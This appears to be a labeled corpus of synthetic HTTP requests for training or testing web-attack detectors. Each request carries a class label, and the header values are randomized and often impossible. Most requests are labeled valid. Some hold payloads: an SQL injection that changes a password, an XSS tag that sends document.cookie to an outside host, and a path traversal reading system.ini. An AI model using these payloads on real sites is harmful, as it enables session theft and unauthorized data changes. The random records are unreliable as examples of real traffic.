If-Range: Wed, 18 May 05 05:16:02 UTC
Max-Forwards: 31
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: NTLM bzBhYW9kcHQzZWVObnZlN3NhYWFpWG5ybnB5dGpudGV2
Range: 876-071,453044-67,-1
Referer: /tn2spot/0lieul/netduhs/31btbni.swf
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/6.0 (compatible; MSIE 1.1; Unix; dexau; encmk; vrEi4)
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 621x863
Via: HTTP/4.4 www.ontuttp.tiff, 1.9 151.25.124.196
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27130
Start - Id: 42445
class: SqlInjection
GET /y8BeI/trtrntTaeNoap8oooto/eQNhmiF/h1ZGST3IrX1H6QI.js?uu=bYs&Q9SR=8865059&wgetGXElogWma=dhe&NIkhzdfj=%3B&jyee=%3Balter++++table+nearasal++++set+++password++++%3D++%27drie%27++where++++name+++++%3D++++%27ntht%27%3B&jinrladgohqH=8th HTTP/1.1
Host: 64.123.162.150
Connection: close
Accept: image/png;q=0.2, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 157.146.100.76
Cookie: m6ooniseoa=lutdh0laeeoiMtaz;u4d=iewaza5ai7u6mu3;c0ben=swEOoygno3hlxnsS1e;srn1h0cahebramd=0MuzI;uhotpnfu=$a;zlobl=rFeeoTeXe
Cookie2: $Version="122"
Date: Tue, 21 Jun 05 14:50:49 GMT
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 100-continue
From: sghAd@3nTei.org
If-Modified-Since: Tue, 02 Jan 07 06:02:37 GMT
If-Unmodified-Since: Mon, 17 Jul 06 03:57:42 UTC
If-Match: "Yd4.RPTuLWsCuF9"
If-None-Match: "sUmghx9.Fo4xOPb"
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 1377
MIME-Version: 9.9
Pragma: y03='en5osshi'
Proxy-Authorization: Digest realm
Authorization: Basic MGxkNWRhOmtlaGlp
Range: 378414-80248,967-,-2698
Referer: /hetneft/nhRE6pA.pl
TE: deflate;q=0.0,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.0 (compatible; euoei7; SunOS sun4u; cts0wh; tl5q; Co7ehhE)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x6235
Via: 2.2 128.56.155.173, 3.3 21.123.115.151, tbd/3.9 www.oit4othh.js
Transfer-Encoding: compress
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42445
Start - Id: 47617
class: XSS
GET /ze3yeWoisrSsnie/a_lMMHvMRaS5pSCwhN5.tiff?qowTiw=iei&eiin6nr5=%3AsU5nfExg&9esnch=fds&a1wnwicrZ=4kDHfVK%40u4OH&qseyhfcDaDc=rstdinny&xs=%26+im&eeEntntauUiteaS=014&DRncr=8cl&o8Eosotgnt9idaa=etdlEbH&bboClwntnue=eNt_b-rlsaek&2hnCv9=access_log&roqeafawiYtk=%3Cobject+++++classid++%3D%22+clsid%3A...+++++%22+codebase+++%3D++%22+++++javascript%3A+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ermeas.com%2Fcgi-bin%2Fsitemele.cgi%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E&GuhfobnAnrecqn7=+aeklvnpassthruekwuy&hxswAgklFofL=rJMPkYh HTTP/1.1
Host: www.elts.uk
Connection: ctSH
Accept: image/gif;q=0.8, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: hertdihe-zwihtm;q=0.6, paoo-obeoY8c, t4retraa-oeheitRo;q=0.8, awmToaX-axIinha;q=0.4, 5ista-cualdds
Cache-Control: no-store
Client-ip: 254.77.17.52
Cookie: tnwmati52tS8hd=rar
Cookie2: $Version="5"
Date: Wed, 21 Oct 09 04:39:34 UTC
ETag: W/"UtO@wp6ZQnYA6s5"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Mon, 03 Mar 08 02:30:33 UTC
If-Match: "kuPc4pLADn3Y1vYBts"
If-None-Match: "ofCqQFy3emovqw4R"
If-Range: Fri, 02 Apr 10 07:39:45 UTC
Max-Forwards: 92
MIME-Version: 9.4
Pragma: rqrr=aMkr8
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: vacee nisir4=jSth
Range: 393273-
Referer: /8nueuwe/boiy/ohblro/t0oriD.gif
TE: trailers
Trailer: Expect
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 9.2; nf-Ea; rv:3.4.1) Gecko/09180972
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: FTP/3.4 53.23.221.198
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47617
Start - Id: 24086
class: Valid
GET /Doenodh/74NZsdtPJa/lFO/eJV/3auGVzrqX8gdzmcnUxJk.gif?rcpLhttpsG-=530221&er=eemqloa&oeeHb5twfeil=2&RV0zIk_Mwtelnete=25221 HTTP/1.0
Host: www.hndpetshnr.cz:03514
Connection: close
Accept: application/x-tar, text/*;q=0.9, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, compress, compress, gzip;q=0.6
Accept-Language: *;q=0.1
Cache-Control: min-fresh=801
Client-ip: 246.18.133.160
Cookie: ptsddEu7Aibrsse=dlETexsEipadd3sj;ensns5eDoiiXte=463945633;st5rteeh=winnth
Cookie2: $Version="56"
Date: Tue, 12 Aug 08 05:22:13 UTC
ETag: "zjZHLCt1trpzrgIsQ"
Expect: 100-continue
From: idehs@lb6ztam.biz
If-Modified-Since: Tue, 01 Jul 08 11:31:03 UTC
If-Unmodified-Since: Fri, 14 Dec 07 05:09:23 UTC
If-Match: "Dw09SQ17GomEktO"
If-None-Match: *
If-Range: Mon, 09 May 05 01:36:36 CET
Max-Forwards: 519
MIME-Version: 3.7
Pragma: o6=y
Proxy-Authorization: NTLM bmVybHltNGdlcGxlaWlUc2R0c29oNHN2NGZ4d2Vvbm10MEc1bHpSSWhpbA==
Authorization: NTLM aGx1b2Fqd1VpZWVzeXU3aDZyb3JnaHJ1ZXMzZWF1bnB0c3RodEloMXUyNmFudGxh
Range: 90505-,-578979,95974-3
Referer: /nBe6hqo/gtqetlf/fhn5d.cgi
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: aNDih4Vu http://www.hactWU.ch
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: o3Oae8/2.7 119.46.44.80:44
Transfer-Encoding: compress
Upgrade: se7/3.4, xaa/8.7, srlhe/8.3
Warning: 485 187.82.157.58:134 "tnesttoEh8tkj" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24086
Start - Id: 5764
class: Valid
PUT /sumAtuiite9dinsnnrl/euNlPtfoe33ac/nosGg65Qp_iq8NCt/ceei8Ittrteeoameidsd.exe? HTTP/1.0
Content-Length: 57
Content-Language: dthhhs,sstcecs
Content-Encoding: gzip
Content-Location: http://www.sodrdef.gov/lnc2nl/95h8B/nar5eEia/ubradi.jsp
Content-MD5: aThzb1RvaTJvMDJpaXJpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Sep 07 01:26:08 CET
Last-Modified: Wed, 20 Jan 10 10:17:12 UTC
Host: 90.211.221.228
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.5, windows-1255;q=0.8
Accept-Encoding: *
Accept-Language: ojiqiv4a-l;q=0.7, l-ohj7ac;q=0.2, tTie-nttay
Cache-Control: min-fresh=3534
Client-ip: 1.90.96.252
Cookie: imgli-etc6K4=601
Cookie2: $Version="7"
Date: Tue, 08 Nov 05 19:00:13 UTC
ETag: "VQuLsoA96NUbIKpr"
Expect: 100-continue
From: S9717u6@qqahmm.cz
If-Modified-Since: Thu, 16 Jun 05 07:20:35 UTC
If-Unmodified-Since: Fri, 06 Jan 06 21:24:02 GMT
If-Match: "bsok9RREQdcQzZK"
If-None-Match: "U-a7WXsS_ViuroqT"
If-Range: *
Max-Forwards: 6130
MIME-Version: 3.5
Pragma: nahi='t1r'
Proxy-Authorization: seRi Rni3ct=uedaamar
Authorization: NTLM UjF4YmV0ZW9paHRpbXR4dGRvZWVkRWVjSW9hc3dldHJlYk5tTWlz
Range: 627-,94191-11363
Referer: http://www.soeb.it/laneeI/doet6cma.conf
TE: trailers,gzip;q=0.1
Trailer: TE
User-Agent: nnqpdrdhi (1g6OR49)
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2088x8163
Via: 5.1 www.sa2ate0.htm, HTTP/2.2 www.a9cgsfju.html
Transfer-Encoding: identity
Upgrade: snbi/3.7, glmEeo/6.6, e8eA/3.9, rtg/0.0, ntx/4.7
Warning: 490 www.Rlrqmzrt.tiff:4521 "npcdrnbmyb8ae" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 4042931462564768
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rThdtfnlagtH=2111947&7qp=13&K3004select-15x1=qewbclQaed4o

End - Id: 5764
Start - Id: 20181
class: Valid
GET /tquOQ7PM5C_PhtLK/uI_CVjEJ3@kThG3CiEj/heB00iQcUZ8s8/TdedmaiDse.mspx?4d9=bshOoe&sRitrctsa=cysY4w_uWps&41rs=mO&Ihgndo=4311 HTTP/1.0
Host: 129.51.11.120
Connection: qesehlfd
Accept: audio/*, video/quicktime
Accept-Charset: x-mac-japanese, x-mac-arabic, euc-kr;q=0.3, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.87.119.255
Cookie: az9t=86794;h8we8crm=48624953;jeChkVs1Wo=o0a9aoai;Mslc2jnhcturi=ee68scjwhere;noait=rhawp-dsmtre
Cookie2: $Version="63"
Date: Mon, 18 Jun 07 21:00:19 GMT
ETag: W/"yG3JG3scvyp8FAK4oj0"
Expect: n5mbdad
From: bgcY@aessp.com
If-Modified-Since: Sun, 09 Sep 07 18:36:35 UTC
If-Unmodified-Since: Tue, 10 Feb 04 15:43:55 GMT
If-Match: "wf1rGbtsRxubkHA4WD."
If-None-Match: "qlqh-Oq6MJmquiqlV"
If-Range: Thu, 18 May 06 11:42:03 CET
Max-Forwards: 16
MIME-Version: 7.1
Pragma: eo=I
Proxy-Authorization: drij yiNes=2wtgpw
Authorization: NTLM dDVNb2NiYWxpZWxjbWhidUVlSGdlYW1lNnJlbGVibHJla2l0ZGVwblhs
Range: 365749-,607-065
Referer: http://hset3h.fr/korded/qad2w/orsiiTt.jsp
TE: trailers
Trailer: User-Agent
User-Agent: sIOgM40IE http://www.brdtddoo.it
UA-CPU: StrongARM
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 199x535
Via: 0.2 51.191.170.57:4945, 3.9 www.tpwcl.js
Transfer-Encoding: gzip
Upgrade: iscH/0.7, aieQ/3.5, toae/3.5
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 67067
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20181
Start - Id: 20786
class: Valid
GET /xUdVI4JIoAnUPpsp/ss15uk@bjQh9mkba4h/eplewbnhM/eet4qnTe5e5hCnoolD/chrhtrrO1i5/3M3AMTiSrw/Scmdwp-UCLlFe/ziciehbvngm2r.msf? HTTP/1.0
Host: www.hTyorahoa8.gov
Connection: jrAem
Accept: application/x-tar;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: tmn-m;q=0.8, pes-rssa0L9t;q=0.3, t-taotji3b, Egta-aeefceud, snboee1-ryeifgo;q=0.9
Cache-Control: no-cache
Client-ip: 104.130.72.27
Cookie: gOohTesN=Sdy0zgsEs7lis;zxezd8E9wffeag=2655727848
Cookie2: $Version="61"
Date: Thu, 27 Nov 08 11:24:52 CET
ETag: W/"goGXVSLIt9v2d-aWUE"
Expect: Reeyl
From: txeT@aevntoegn.com
If-Modified-Since: Thu, 12 Nov 09 03:17:57 UTC
If-Unmodified-Since: Thu, 06 Sep 07 16:33:33 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Mar 09 15:35:08 CET
Max-Forwards: 5266
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: NTLM bmlMM25lc2Z2ZnJvN2R5YWlscm9pdGU5cmxpZXRmcFNlZWVlU2l0QWx0cGQ=
Range: 468072-,7838-92,92-4796
Referer: /upnar/ansU0n/ronrmle/n9ms.swf
TE: trailers
Trailer: If-Range
User-Agent: hcUsaj5eTy0mei8
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: dt5S/8.8 165.246.220.101
Transfer-Encoding: l2kheu
Upgrade: Rnr5/1.3, ol8/4.8, 63n/1.1, sira/9.0, se4raU/9.0
Warning: 706 www.dm5th.js "inie" 
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 39917227024822129
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20786
Start - Id: 36028
class: PathTransversal
GET /zqvxSPAB/kI8-B-jcBQSz/yTJaT2OjITM.SrBiiT/e8wYt1O/2vFd-x/majt89OH5F.gif?jtiHs=+it+&fn-Rq@9M=cyenSf45a2&ze=emailowtreplacef0Hshee&0aaeL=92873&fru0sty=hejneahai&iUiitE=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 42.219.115.196
Connection: close
Accept: text/*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.4, euc-kr;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: t70-d1c6e2;q=0.4, u-at;q=0.4, r-tb;q=0.2, o-wral;q=0.4
Cache-Control: min-fresh=34
Client-ip: 110.116.43.149
Cookie: HdN=ha
Cookie2: $Version="228"
Date: Sun, 01 Mar 09 11:32:09 CET
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: eahHqSh@pqrt.com
If-Modified-Since: Tue, 15 Apr 08 07:22:48 UTC
If-Unmodified-Since: Sat, 15 Apr 06 24:16:58 UTC
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: *
If-Range: *
Max-Forwards: 7012
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Basic c2V0d2h0bDoxcmx5aQ==
Range: -05066,-92,-024075
Referer: http://8emfuech.gov/rdaega.jpg
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: emTEp1s/7.4
UA-Disp: 097,2396,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: deflate
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 341 181.125.130.56 "jenecjbHicooniain4f" "Thu, 13 Apr 06 16:57:19 GMT"
X-Forwarded-For: 99.130.22.61
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36028
Start - Id: 6505
class: Valid
PUT /nYOmKuh3/e0MPSNemCSBVTSqvwL/n@kw.NVVLEUmtTRQl9/LGNahSIuv/1ZkD/rcpsystemE7IY./t.y/tOT2zfrgqu/oscti3Eilietegnt7am/nH1pTGP2uKMH/l6uZjNN0gU.dll? HTTP/1.1
Content-Length: 200
Content-Language: ht4u5t5,sxgiee
Content-Encoding: identity
Content-Location: http://Eonr.org/sdhzNese/Pwteph/ledeies/nnytih.asp
Content-MD5: dGpoc2lkYWV1cnNzdGllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Mar 07 09:32:12 CET
Last-Modified: Tue, 31 Mar 09 01:39:51 CET
Host: 20.114.227.9:48
Connection: airae
Accept: video/*;q=0.9
Accept-Charset: hz-gb-2312;q=0.7
Accept-Encoding: gzip;q=0.6, gzip;q=0.5, compress;q=0.3, identity;q=0.4, compress;q=0.5
Accept-Language: kco-attysor;q=0.0, aebE-ufrigt, ik9-ngitaeuv
Cache-Control: only-if-cached
Client-ip: 197.127.12.143
Cookie: 9ri=hoconnectwindow.openut1Tsdc;BDsl=lwrzngam\o abton;neccrbuh8ie=731329699;bpets=7;f7k9LT=3shErsetQeahLLjiea
Cookie2: $Version="12"
Date: Wed, 21 Apr 04 10:45:24 GMT
ETag: W/"WTPTmdf-i0q-ybK"
Expect: 100-continue
From: s4epsqsd@rotiihceen.net
If-Modified-Since: Mon, 10 May 04 09:52:26 UTC
If-Unmodified-Since: Fri, 29 Apr 05 04:07:14 CET
If-Match: *
If-None-Match: "HjEjSj48T3ukwNsxuE3@"
If-Range: "zbxZg9W5tyXcGIo9W9Me"
Max-Forwards: 3
MIME-Version: 7.4
Pragma: khrphy=rhnf4t
Proxy-Authorization: NTLM ZXludzZ2cjlvYWVhcTV0S0RjNG9Ud3Nzb2F1b2NuZDc=
Authorization: Digest nc=3DE432e4
Range: -0,37191-913541,986937-
Referer: /mptDstv.asp
TE: deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 8.2; ct-S8; rv:8.5.4) Gecko/04551017
UA-CPU: x86
UA-Disp: 8394,8208,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9481x739
Via: 2.6 www.lbamm.js, 2.0 139.64.235.154
Transfer-Encoding: deflate
Upgrade: ropcwa/9.2
Warning: 905 www.vuHjLrce.jpeg "bzvewwcnnhcIww" "Sat, 06 Mar 04 23:19:48 UTC"
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 58041011028
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

8zejptrerebloe=958&3eawcahdrciod=enL3p9&e4=6&AxrizRti=e\Nnhigi[&tmea2Grehatsa=Ihtnc&sa8it9i=61&ubmdmaot0=uwnBmBO7as&sIwreadzset=53&wZkwcopy=lerhztvar; ay&enesbif=qwnMmxI4gft&6s7o2eTbp=6581932496

End - Id: 6505
Start - Id: 4228
class: Valid
POST /d5inwyCKDIN8IXR@/osT3strs/4a/TEKVI/oi9/oDmWecnWDd_2xej-Rp/t5baStv9Ju/s@y/9tweoEl.cgi? HTTP/1.0
Content-Length: 264
Content-Language: dIesn,Ahjebtb,T
Content-Encoding: compress
Content-Location: http://www.pfoko5em.it/e02sde/qeaef.jpg
Content-MD5: aHJkNmxvbm9sMW5uZWRubw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jan 05 19:34:39 GMT
Last-Modified: Wed, 10 Dec 08 07:52:57 UTC
Host: 22.18.17.121:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: cp-936, x-mac-greek;q=0.1, shift_jis
Accept-Encoding: *;q=0.5
Accept-Language: nThia-ebsoyU
Cache-Control: no-store
Client-ip: 184.148.250.255
Cookie: 4adminhavingwinnt=?m;smsSrvNreluo=rdts4t;rae7j4TebnLav=tdOwlpte
Cookie2: $Version="20"
Date: Sun, 26 Feb 06 04:27:35 UTC
ETag: "DP4avm52xf@B639Ld4s"
Expect: 81eont
From: vr3pieee@taudgsrefW.org
If-Modified-Since: Thu, 07 Sep 06 24:24:03 CET
If-Unmodified-Since: Thu, 17 May 07 12:06:42 GMT
If-Match: *
If-None-Match: "-Z6xdD_Xm-NxlJweQQ2W"
If-Range: *
Max-Forwards: 72
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM N2FvdGxtZGVpc3VodHRqdGxhNnpsNW5jYzFrZjFhaXRuYg==
Range: 936255-,7-,-5
Referer: /z3a4o9.sh
TE: chunked,trailers,gzip;q=0.8
Trailer: Range
User-Agent: Mozilla/6.8 (X11; U; SunOS sun4u 2.5; i1-9s; rv:8.0.1) Gecko/62360322
UA-CPU: x86
UA-Disp: 9117,635,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0647x7057
Via: 8.3 237.148.228.18:90, 4.4 196.61.209.91
Transfer-Encoding: gzip
Upgrade: 5ck/7.3
Warning: 544 www.hni2dj.shtml:11 "OemiccOl" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 3720829433622
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

engpit=17224&gesoseee9araeoe=69&rgm9=9vsgfe6&a4shROl=9324&nltqaunaumnfs=iQvF5-&ceieG=vDdlvIT4b&AAwprocessing-instructionq=e6Nf5k&uh=59401149&Piaxr=\vh9 reuedcdqdw&hei2frna=n_dsMXg0&AIoerTgteenIii=tcnetcatvhmochamsRibadw&eeotsdrsrreF=053&gtu1xp_d@sY6Ak=gcrhei~h

End - Id: 4228
Start - Id: 30685
class: Valid
GET /9torj7Ohsa/lm/C8script@0F/daonjeqi1edd/exdMRo/CVOEaBkmail/nOVJPYt@gx/cvcncKYW7htpass1TexecLall/eFYW-9o8nu_O/rwhrevusq6brAor/lcQgibF@Pg6qIrrVsQnX/e0UBOJe5g9Y.css?@connectacceptIjB_44updatei=h%7Eip&cnyny=jxeRn%26h&Rcn=4&Uusr2LYTEbcs=tIeo&eroy=aa0Dgi&nst1hvldeoywfh=6Uqv&Ahn9s04iksL=i.LU&mp7iaw=%3B+Lnnw%24b&rv3=inEuhebgah+e&-JRc6yjhttpQ3A=oerunessg&Pohml=0ife6rLssrtjear&AY5ALHrm=OHtcopyaee+e+i&eiet3rluyh=nhImoihi3a0eD HTTP/1.1
Host: 34.138.77.165
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: utf-8;q=0.5, x-mac-arabic;q=0.8, x-mac-icelandic
Accept-Encoding: gzip;q=0.5, compress, deflate, gzip
Accept-Language: *
Cache-Control: max-age=636
Client-ip: 81.23.165.165
Cookie: JTpjiVpasswdH8=rAzZ;gesndbrmen6zepi=l4liq
Cookie2: $Version="5"
Date: Sun, 30 Oct 05 21:33:30 GMT
ETag: W/"Kc4B2yCixSefOHc"
Expect: Selo0dy=sc1LteA
From: aeec@eeAs.fr
If-Modified-Since: Mon, 26 Jul 04 16:13:29 GMT
If-Unmodified-Since: Fri, 23 Sep 05 10:04:14 GMT
If-Match: "sdX6m8_IsZAlrlYpUw"
If-None-Match: *
If-Range: Thu, 08 Jun 06 23:46:32 UTC
Max-Forwards: 222
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM NTdudWg3Ym5obGFlMFR2ZWliaXNhYWR0NHR4NTRhcnNvSXRhbw==
Authorization: Basic eWVuc2ZlaW86aXVkWXRzbw==
Range: 174-63482
Referer: http://er6yfaui.net/tesgoa.swf
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: moiefard (rQ5NT3)
UA-CPU: MIPS
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 8.9 7.244.61.105, FTP/4.5 www.boaI.jpeg, HTTP/6.6 187.224.114.237
Transfer-Encoding: TaeotE; a6ve=Uyinisn
Upgrade: nrr/7.3, ssae/3.9, Uaehed/6.1
Warning: 212 www.aeeaeyio.jpg "iorto9Sgs" "Wed, 05 Nov 08 05:06:08 GMT"
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30685
Start - Id: 1318
class: Valid
GET /G4tdt1corn8r/q3COmBmClgDqpoYX/t2xFq@E0fcmkGrZB/5GcupdateSlike1U3BBKrcp/cqp6be/posbAl4llNnfmj0lbrea/wt.msf?p8neimcigh=ney&uThidaerttede=egaBPWTsgzsD&oe1=5gnad&pahh=obeplotay%2Fw&ett9Zes=foetEueoeuiseonoys HTTP/1.0
Host: 183.223.192.124
Connection: close
Accept: video/*, application/*, video/*
Accept-Charset: koi8;q=0.3
Accept-Encoding: 
Accept-Language: gsoeurnO-rXD5utr;q=0.7, 4c-ltnsR0n
Cache-Control: no-store
Client-ip: 58.67.184.51
Cookie: obQnFF=otoehwjt6noapced;a8eEagc=QsPd;aelsudaeCbm11Yu=06380211;aotqscissn=88
Cookie2: $Version="16"
Date: Wed, 27 Oct 04 20:45:05 CET
ETag: "HQ8uSCW@L4-@PRWl"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Fri, 06 Feb 09 23:10:09 CET
If-Match: *
If-None-Match: "SaphDDFJ8xqbGrf2nGjz"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="REsn"
Authorization: Digest algorithm=MD5-sess
Range: -216
Referer: /SihsMcu/oeng/dtoza/r9oE/gbIe.gif
TE: chunked
Trailer: Accept-Language
User-Agent: nh0D3iNt (gued0P; ebqWLEXt; a2U9tUb)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 290x591
Via: icv/7.7 190.61.29.93, HTTP/8.7 8.138.127.117, 1.4 www.mt3e.jpeg
Transfer-Encoding: deflate
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 5002985496023
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1318
Start - Id: 13505
class: Valid
GET /tY0HSfMP.MQXP--8/kop4HpvKiitt60/cFrkw88EnhB5NkF/onesse5donaem/didsnjnFw1n/svPnmVXdGf/ZnodeXmp4replace.w.tiff? HTTP/1.1
Host: 164.88.9.211:00
Connection: xooutaF
Accept: application/postscript;q=0.9, audio/*
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: te3to=7
Client-ip: 180.68.206.0
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="839"
Date: Sat, 04 Oct 08 10:24:43 UTC
ETag: "85dy8TIvwmZmcGoY"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Sun, 10 Jul 05 09:30:20 GMT
If-Unmodified-Since: Sat, 20 Mar 04 23:09:23 UTC
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: *
Max-Forwards: 06
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: NTLM ZHhybTBuc2xlTmZycXBpdGU1RW9hbWFobmsxbmdoNXNsZGk=
Range: 81977-983962,396-,08380-3287
Referer: http://www.jarrson.uk/eqdraSnr/us7xa/sr1t/Aahcyne3.bin
TE: chunked;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/4.3 (compatible; enhui42ts; Linux i586; uodb0MoioH; aldrs9e41a)
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 4.2 www.d8g5h.gif, 5.2 www.wlelne.jpeg, 6.6 224.206.150.74
Transfer-Encoding: identity
Upgrade: erhior/3.3, Rhsar/6.0, od4j/1.5, 2oea9/3.9
Warning: 978 33.78.245.99:637 "4reogL9uehdytlttda" "Sun, 28 Aug 05 08:38:30 UTC"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 43048175021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13505
Start - Id: 11943
class: Valid
GET /NrFoqalneeosSdtblei/ha7igsme/7NwnQIj/eLjY/tH-u8zEyh3S2D/trthw.php3?ptvWe=ue&9cye5e=pls83eomB&ha5dE=ifnmsUtryqeb&b0i96n=nFGWXU5n3&tge7Ie9Hce=j8n2cdxdetTastlea&l6doej=9bvV&EAzbielSoeg=5yieet&DuEorDtd=Psn0RtorF7bekebdte&nTjtvhoanwaiolr=92&AQqNS2=rtt+h+%3Eni&ert8j=ahi7edemltwoT&vn5iodesnngltue=aCuHwiHIkS HTTP/1.0
Host: www.OmNzan0e.uk
Connection: rgnrenq2
